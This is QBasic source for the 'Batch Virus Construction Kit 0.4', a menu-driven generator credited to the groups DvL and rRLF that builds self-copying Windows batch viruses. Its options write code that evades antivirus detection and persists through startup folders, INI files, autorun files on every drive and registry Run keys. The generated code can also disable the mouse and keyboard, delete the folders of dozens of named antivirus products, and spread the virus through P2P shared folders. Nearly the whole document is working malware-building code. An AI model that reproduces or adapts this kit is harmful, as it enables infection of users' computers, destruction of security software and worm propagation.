CLS
bvck$="Batch Virus Construction Kit 0.4"
RANDOMIZE TIMER
rdm=INT(RND*26)+97
az1$=CHR$(rdm)
rdm=INT(RND*26)+97
az2$=CHR$(rdm)
rdm=INT(RND*26)+97
az3$=CHR$(rdm)
rdm=INT(RND*26)+97
az4$=CHR$(rdm)
rdm=INT(RND*26)+97
az5$=CHR$(rdm)
rdm=INT(RND*26)+97
az6$=CHR$(rdm)
rdm=INT(RND*26)+97
az7$=CHR$(rdm)
rdm=INT(RND*26)+97
az8$=CHR$(rdm)
rdm2$=az1$+az2$+az3$+az4$+az5$+az6$+az7$+az8$
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
COLOR 3
PRINT ""
PRINT ""
INPUT "   Name of author: ", author$
PRINT ""
PRINT ""
INPUT "   Name of saved virus (filename.ext): ", vir$
main:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Fooling AV`z"
PRINT "     дддддддддддд"
PRINT ""
PRINT "    1 - EICAR"
PRINT "    2 - 1000 fake bytes"
PRINT "    3 - EICAR & 1000 fake bytes"
PRINT ""
PRINT "    4 - Next page"
PRINT ""
PRINT "    5 - eXit"
PRINT ""
PRINT ""
INPUT "    Your choice: ", bgn
IF bgn=1 THEN GOTO a1
IF bgn=2 THEN GOTO a2
IF bgn=3 THEN GOTO a3
IF bgn=4 THEN GOTO a0
IF bgn=5 THEN GOTO done
GOTO main

a1:
OPEN vir$ FOR OUTPUT AS #1
PRINT #1, "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
PRINT #1, "::"
PRINT #1, ":: Generated by "; bvck$; " [DvL]-[rRLF]"
PRINT #1, ":: Created by "; author$; ""
PRINT #1, "::"
PRINT #1, "@echo off"
PRINT #1, "@ver|find "; CHR$(34); "XP"; CHR$(34); "|if errorlevel 1 ctty nul|if not errorlevel 1 exit"
PRINT #1, "break off"
PRINT #1, "copy %0 %windir%\"; rdm2$; ".bat>nul"
CLOSE #1
GOTO b1

a2:
OPEN vir$ FOR OUTPUT AS #1
q=0
qA:
w=0
DO WHILE w <= 97
ran=INT(RND*26)+97
a$=CHR$(ran)
B$=B$+a$
w=w+1
LOOP
w=0
B$=B$+AA$
PRINT #1, B$
B$=""
q=q+1
IF q <= 9 THEN GOTO qA
PRINT #1, "::"
PRINT #1, ":: Generated by "; bvck$; " [DvL]-[rRLF]"
PRINT #1, ":: Created by "; author$; ""
PRINT #1, "::"
PRINT #1, "@echo off"
PRINT #1, "@ver|find "; CHR$(34); "XP"; CHR$(34); "|if errorlevel 1 ctty nul|if not errorlevel 1 exit"
PRINT #1, "break off"
PRINT #1, "copy %0 %windir%\"; rdm2$; ".bat>nul"
CLOSE #1
GOTO b1

a3:
OPEN vir$ FOR OUTPUT AS #1
PRINT #1, "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
q=0
qB:
w=0
DO WHILE w <= 97
ran=INT(RND*26)+97
a$=CHR$(ran)
B$=B$+a$
w= w+1
LOOP
w=0
B$=B$+AA$
PRINT #1, B$
B$=""
q=q+1
IF q <= 9 THEN GOTO qB
PRINT #1, "::"
PRINT #1, ":: Generated by "; bvck$; " [DvL]-[rRLF]"
PRINT #1, ":: Created by "; author$; ""
PRINT #1, "::"
PRINT #1, "@echo off"
PRINT #1, "@ver|find "; CHR$(34); "XP"; CHR$(34); "|if errorlevel 1 ctty nul|if not errorlevel 1 exit"
PRINT #1, "break off"
PRINT #1, "copy %0 %windir%\"; rdm2$; ".bat>nul"
CLOSE #1
GOTO b1

a0:
OPEN vir$ FOR OUTPUT AS #1
PRINT #1, "::"
PRINT #1, ":: Generated by "; bvck$; " [DvL]-[rRLF]"
PRINT #1, ":: Created by "; author$; ""
PRINT #1, "::"
PRINT #1, "@echo off"
PRINT #1, "@ver|find "; CHR$(34); "XP"; CHR$(34); "|if errorlevel 1 ctty nul|if not errorlevel 1 exit"
PRINT #1, "break off"
PRINT #1, "copy %0 %windir%\"; rdm2$; ".bat>nul"
CLOSE #1

b1:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
COLOR 3
PRINT "     Running options"
PRINT "     ддддддддддддддд"
PRINT ""
PRINT "    1 - Run via STARTUP folder"
PRINT "    2 - Run via WIN.INI file"
PRINT "    3 - Run via SYSTEM.INI file"
PRINT "    4 - Run via AUTORUN.INF file"
PRINT "    5 - Run via REGISTRY keys"
PRINT "    6 - Run via AUTOEXEC.BAT file"
PRINT "    7 - Run via WINSTART.BAT file"
PRINT ""
PRINT "    8 - Next page"
PRINT "    
PRINT "    9 - eXit & compile ..."
PRINT ""
INPUT "    Your choice: ", bgn
IF bgn=1 THEN GOTO a4
IF bgn=2 THEN GOTO a5
IF bgn=3 THEN GOTO a6
IF bgn=4 THEN GOTO a7
IF bgn=5 THEN GOTO b2
IF bgn=6 THEN GOTO a8
IF bgn=7 THEN GOTO a9
IF bgn=8 THEN GOTO b3
IF bgn=9 THEN GOTO done
GOTO b1

a4:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "copy %0 %windir%\startm~1\programs\startup\"; rdm2$; ".bat>nul"
CLOSE #1
GOTO b3

a5:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "find /v /i "; CHR$(34); "[windows]"; CHR$(34); "<%windir%\win.ini>"; az3$; ""
PRINT #1, "find /v /i "; CHR$(34); "load="; CHR$(34); "<"; az3$; ">"; az4$; ""
PRINT #1, "find /v /i "; CHR$(34); "run="; CHR$(34); "<"; az4$; ">"; az3$; ""
PRINT #1, "find /v /i "; CHR$(34); "NullPort="; CHR$(34); "<"; az3$; ">"; az4$; ""
PRINT #1, "deltree/y "; az3$; ">nul"
PRINT #1, "echo.[windows]>%windir%\win.ini"
PRINT #1, "echo.load=%windir%\"; rdm2$; ".bat>>%windir%\win.ini"
PRINT #1, "echo.run=>>%windir%\win.ini"
PRINT #1, "echo.NullPort=None>>%windir%\win.ini"
PRINT #1, "echo.>>%windir%\win.ini"
PRINT #1, "type "; az4$; ">>%windir%\win.ini"
PRINT #1, "deltree/y "; az4$; ">nul"
CLOSE #1
GOTO b3

a6:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "find /v /i "; CHR$(34); "[boot]"; CHR$(34); "<%windir%\system.ini>"; az3$; ""
PRINT #1, "find /v /i "; CHR$(34); "shell=explorer.exe"; CHR$(34); "<"; az3$; ">"; az1$; ""
PRINT #1, "deltree/y "; az3$; ">nul"
PRINT #1, "echo.[boot]>%windir%\system.ini"
PRINT #1, "echo.Shell=Explorer.exe %windir%\"; rdm2$; ".bat>>%windir%\system.ini"
PRINT #1, "echo.>>%windir%\system.ini"
PRINT #1, "type "; az1$; ">>%windir%\system.ini"
PRINT #1, "deltree/y "; az1$; ">nul"
CLOSE #1
GOTO b3

a7:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.[AutoRun]>%windir%\"; rdm2$; ".inf"
PRINT #1, "echo.open=%windir%\"; rdm2$; ".bat>>%windir%\"; rdm2$; ".inf"
PRINT #1, "echo.icon=%windir%\system\shell32.dll,0>>%windir%\"; rdm2$; ".inf"
PRINT #1, "for %%"; az8$; " in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%"; az8$; ":\nul copy %windir%\"; rdm2$; ".inf %%"; az8$; ":\autorun.inf /y"
CLOSE #1
GOTO b3

a8:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.@call %windir%\"; rdm2$; ".bat>>c:\autoexec.bat"
CLOSE #1
GOTO b3

a9:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.@call %windir%\"; rdm2$; ".bat>%windir%\winstart.bat"
CLOSE #1
GOTO b3

b2:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
COLOR 3
PRINT "     Registry startup"
PRINT "     дддддддддддддддд"
PRINT ""
PRINT "    1 - Run             (LOCAL MACHINE)"
PRINT "    2 - Run-            (LOCAL MACHINE)"
PRINT "    3 - RunOnce         (LOCAL MACHINE)"
PRINT "    4 - RunServices     (LOCAL MACHINE)"
PRINT "    5 - RunServices-    (LOCAL MACHINE)"
PRINT "    6 - RunServicesOnce (LOCAL MACHINE)"
PRINT "    7 - Run             (CURRENT USER)"
PRINT "    8 - RunOnce         (CURRENT USER)"
PRINT ""
PRINT "    9 - Back to Running options"
PRINT ""
PRINT "   10 - Next page"
PRINT ""
PRINT "   11 - eXit & compile ..."
PRINT ""
INPUT "    Your choice: ", bgn
IF bgn=1 THEN GOTO a10
IF bgn=2 THEN GOTO a11
IF bgn=3 THEN GOTO a12
IF bgn=4 THEN GOTO a13
IF bgn=5 THEN GOTO a14
IF bgn=6 THEN GOTO a15
IF bgn=7 THEN GOTO a16
IF bgn=8 THEN GOTO a17
IF bgn=9 THEN GOTO b1
IF bgn=10 THEN GOTO b3
IF bgn=11 THEN GOTO done
GOTO b2

a10:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; rdm2$; ".reg"
PRINT #1, "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>%windir%\"; rdm2$; ".reg"
CLOSE #1
GOTO a18

a11:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; rdm2$; ".reg"
PRINT #1, "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run-]>>%windir%\"; rdm2$; ".reg"
CLOSE #1
GOTO a18

a12:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; rdm2$; ".reg"
PRINT #1, "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]>>%windir%\"; rdm2$; ".reg"
CLOSE #1
GOTO a18

a13:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; rdm2$; ".reg"
PRINT #1, "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]>>%windir%\"; rdm2$; ".reg"
CLOSE #1
GOTO a18

a14:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; rdm2$; ".reg"
PRINT #1, "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices-]>>%windir%\"; rdm2$; ".reg"
CLOSE #1
GOTO a18

a15:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; rdm2$; ".reg"
PRINT #1, "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]>>%windir%\"; rdm2$; ".reg"
CLOSE #1
GOTO a18

a16:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; rdm2$; ".reg"
PRINT #1, "echo.[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>%windir%\"; rdm2$; ".reg"
CLOSE #1
GOTO a18

a17:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; rdm2$; ".reg"
PRINT #1, "echo.[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]>>%windir%\"; rdm2$; ".reg"
CLOSE #1

a18:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo."; CHR$(34); ; rdm2$; ; CHR$(34); "="; CHR$(34); "%windir%\"; rdm2$; ".bat"; CHR$(34); ">>%windir%\"; rdm2$; ".reg"
PRINT #1, "regedit /s %windir%\"; rdm2$; ".reg"
CLOSE #1

b3:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Mouse & keyboard payloads"
PRINT "     ддддддддддддддддддддддддд"
PRINT ""
PRINT "    1 - Disable mouse & keyboard"
PRINT "    2 - Disable keyboard & swap mouse buttons"
PRINT ""
PRINT "    3 - Next page"
PRINT ""
PRINT "    4 - eXit & compile ..."
PRINT ""
PRINT ""
INPUT "    Your choice: ", bgn
IF bgn=1 THEN GOTO a19
IF bgn=2 THEN GOTO a20
IF bgn=3 THEN GOTO b4
IF bgn=4 THEN GOTO done
GOTO b3

a19:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "rundll32 mouse,disable"
PRINT #1, "rundll32 keyboard,disable"
CLOSE #1
GOTO b4

a20:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "rundll32 user,swapmousebutton"
PRINT #1, "rundll32 keyboard,disable"
CLOSE #1

b4:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Retro"
PRINT "     ддддд"
PRINT ""
PRINT "    1 - Delete AntiViruses"
PRINT ""
PRINT "    2 - Next page"
PRINT ""
PRINT "    3 - eXit & compile ..."
PRINT ""
PRINT ""
INPUT "    Your choice: ", bgn
IF bgn=1 THEN GOTO a21
IF bgn=2 THEN GOTO b5
IF bgn=3 THEN GOTO done
GOTO b4

a21:
dlt$=az4$+az6$+az8$
OPEN vir$ FOR APPEND AS #1
PRINT #1, "set "; dlt$; "=deltree/y c:\"
PRINT #1, "%"; dlt$; "%antiba~1\>nul"
PRINT #1, "%"; dlt$; "%antiba~2\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.1\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.2\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.3\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.4\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.5\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.6\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.7\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.8\>nul"
PRINT #1, "%"; dlt$; "%antivi~1\>nul"
PRINT #1, "%"; dlt$; "%antivi~2\>nul"
PRINT #1, "%"; dlt$; "%antiviru\>nul"
PRINT #1, "%"; dlt$; "%avg\>nul"
PRINT #1, "%"; dlt$; "%avp\>nul"
PRINT #1, "%"; dlt$; "%avp30\>nul"
PRINT #1, "%"; dlt$; "%avx\>nul"
PRINT #1, "%"; dlt$; "%avpers~1\>nul"
PRINT #1, "%"; dlt$; "%bitdef~1\>nul"
PRINT #1, "%"; dlt$; "%bitdef~2\>nul"
PRINT #1, "%"; dlt$; "%comman~1\>nul"
PRINT #1, "%"; dlt$; "%cleancih\>nul"
PRINT #1, "%"; dlt$; "%esafen\>nul"
PRINT #1, "%"; dlt$; "%findvi~1\>nul"
PRINT #1, "%"; dlt$; "%f-macro\>nul"
PRINT #1, "%"; dlt$; "%f-prot\>nul"
PRINT #1, "%"; dlt$; "%f-prot95\>nul"
PRINT #1, "%"; dlt$; "%f-secu~1\>nul"
PRINT #1, "%"; dlt$; "%fwin\>nul"
PRINT #1, "%"; dlt$; "%fwin32\>nul"
PRINT #1, "%"; dlt$; "%inocul~1\>nul"
PRINT #1, "%"; dlt$; "%inocul~2\>nul"
PRINT #1, "%"; dlt$; "%kasper~1\>nul"
PRINT #1, "%"; dlt$; "%kasper~2\>nul"
PRINT #1, "%"; dlt$; "%mcafee\>nul"
PRINT #1, "%"; dlt$; "%mcafee~1\>nul"
PRINT #1, "%"; dlt$; "%msav\>nul"
PRINT #1, "%"; dlt$; "%norman\>nul"
PRINT #1, "%"; dlt$; "%norton~1\>nul"
PRINT #1, "%"; dlt$; "%norton~2\>nul"
PRINT #1, "%"; dlt$; "%pav\>nul"
PRINT #1, "%"; dlt$; "%pccill~1\>nul"
PRINT #1, "%"; dlt$; "%pc-cil~1\>nul"
PRINT #1, "%"; dlt$; "%rav\>nul"
PRINT #1, "%"; dlt$; "%softwin\>nul"
PRINT #1, "%"; dlt$; "%tbav\>nul"
PRINT #1, "%"; dlt$; "%tbavw95\>nul"
PRINT #1, "%"; dlt$; "%toolkit\>nul"
PRINT #1, "%"; dlt$; "%trendm~1\>nul"
PRINT #1, "%"; dlt$; "%trex\>nul"
PRINT #1, "%"; dlt$; "%virus\>nul"
PRINT #1, "%"; dlt$; "%vpc\>nul"
PRINT #1, "%"; dlt$; "%vs95\>nul"
PRINT #1, "%"; dlt$; "%zonela~1\>nul"
PRINT #1, "%"; dlt$; "%zonela~2\>nul"
PRINT #1, "set "; dlt$; "=deltree/y c:\progra~1\"
PRINT #1, "%"; dlt$; "%antiba~1\>nul"
PRINT #1, "%"; dlt$; "%antiba~2\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.1\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.2\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.3\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.4\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.5\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.6\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.7\>nul"
PRINT #1, "%"; dlt$; "%antiba~1.8\>nul"
PRINT #1, "%"; dlt$; "%antivi~1\>nul"
PRINT #1, "%"; dlt$; "%antivi~2\>nul"
PRINT #1, "%"; dlt$; "%avg\>nul"
PRINT #1, "%"; dlt$; "%avp\>nul"
PRINT #1, "%"; dlt$; "%avx\>nul"
PRINT #1, "%"; dlt$; "%avx2000\>nul"
PRINT #1, "%"; dlt$; "%avpers~1\>nul"
PRINT #1, "%"; dlt$; "%bitdef~1\>nul"
PRINT #1, "%"; dlt$; "%bitdef~2\>nul"
PRINT #1, "%"; dlt$; "%comman~1\>nul"
PRINT #1, "%"; dlt$; "%common~1\avpsha~1\>nul"
PRINT #1, "%"; dlt$; "%common~1\symant~1\>nul"
PRINT #1, "%"; dlt$; "%datafe~1\>nul"
PRINT #1, "%"; dlt$; "%deerfi~1.com\>nul"
PRINT #1, "%"; dlt$; "%f-prot\>nul"
PRINT #1, "%"; dlt$; "%f-prot95\>nul"
PRINT #1, "%"; dlt$; "%findvi~1\>nul"
PRINT #1, "%"; dlt$; "%f-secu~1\>nul"
PRINT #1, "%"; dlt$; "%f-secure\>nul"
PRINT #1, "%"; dlt$; "%fsi\>nul"
PRINT #1, "%"; dlt$; "%fwin\>nul"
PRINT #1, "%"; dlt$; "%fwin32\>nul"
PRINT #1, "%"; dlt$; "%grisoft\>nul"
PRINT #1, "%"; dlt$; "%inocul~1\>nul"
PRINT #1, "%"; dlt$; "%inocul~2\>nul"
PRINT #1, "%"; dlt$; "%intern~2\>nul"
PRINT #1, "%"; dlt$; "%kasper~1\>nul"
PRINT #1, "%"; dlt$; "%kasper~2\>nul"
PRINT #1, "%"; dlt$; "%mcafee\>nul"
PRINT #1, "%"; dlt$; "%mcafee~1\>nul"
PRINT #1, "%"; dlt$; "%mindso~1\>nul"
PRINT #1, "%"; dlt$; "%norman\>nul"
PRINT #1, "%"; dlt$; "%norton~1\>nul"
PRINT #1, "%"; dlt$; "%norton~2\>nul"
PRINT #1, "%"; dlt$; "%pandas~1\>nul"
PRINT #1, "%"; dlt$; "%protec~1\>nul"
PRINT #1, "%"; dlt$; "%protec~2\>nul"
PRINT #1, "%"; dlt$; "%quickh~1\>nul"
PRINT #1, "%"; dlt$; "%rav\>nul"
PRINT #1, "%"; dlt$; "%signal9\>nul"
PRINT #1, "%"; dlt$; "%softwin\>nul"
PRINT #1, "%"; dlt$; "%spysto~1\>nul"
PRINT #1, "%"; dlt$; "%symant~1\>nul"
PRINT #1, "%"; dlt$; "%tbav\>nul"
PRINT #1, "%"; dlt$; "%tinype~1\>nul"
PRINT #1, "%"; dlt$; "%trendm~1\>nul"
PRINT #1, "%"; dlt$; "%trendp~1\>nul"
PRINT #1, "%"; dlt$; "%trojan~1\>nul"
PRINT #1, "%"; dlt$; "%trojan~2\>nul"
PRINT #1, "%"; dlt$; "%virusm~1.0\>nul"
PRINT #1, "%"; dlt$; "%zonela~1\>nul"
PRINT #1, "%"; dlt$; "%zonela~2\>nul"
PRINT #1, "set "; dlt$; "="
CLOSE #1

b5:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     P2P worm"
PRINT "     дддддддд"
PRINT ""
PRINT "    1 - Spread via p2p"
PRINT ""
PRINT "    2 - eXit & compile ..."
PRINT ""
PRINT ""
INPUT "    Your choice: ", bgn
IF bgn=1 THEN GOTO a22
IF bgn=2 THEN GOTO done
GOTO main

a22:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "copy %0 c:\kazaa\myshar~1\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\mydown~1\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\mydocu~1\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\eigene~1\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\progra~1\applej~1\incoming\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\progra~1\bearsh~1\shared\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\progra~1\edonke~1\incoming\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\progra~1\emule\incoming\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\progra~1\grokster\mygrok~1\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\progra~1\icq\shared~1\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\progra~1\kazaa\myshar~1\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\progra~1\kazaal~1\myshar~1\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\progra~1\kmd\myshar~1\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\progra~1\limewire\shared\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\progra~1\morpheus\myshar~1\"; rdm2$; ".bat>nul"
PRINT #1, "copy %0 c:\progra~1\overnet\bundles\"; rdm2$; ".bat>nul"
CLOSE #1

done:
CLS
OPEN vir$ FOR APPEND AS #1
PRINT #1, "cls"
CLOSE #1
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
COLOR 3
PRINT ""
PRINT ""
PRINT ""
PRINT ""
PRINT "     Your creation is now compiled in curent folder as "; vir$; ""
PRINT ""
PRINT ""
PRINT ""
PRINT "     Watch out for the next version, "; author$; " ..."
PRINT ""
PRINT ""
Ende: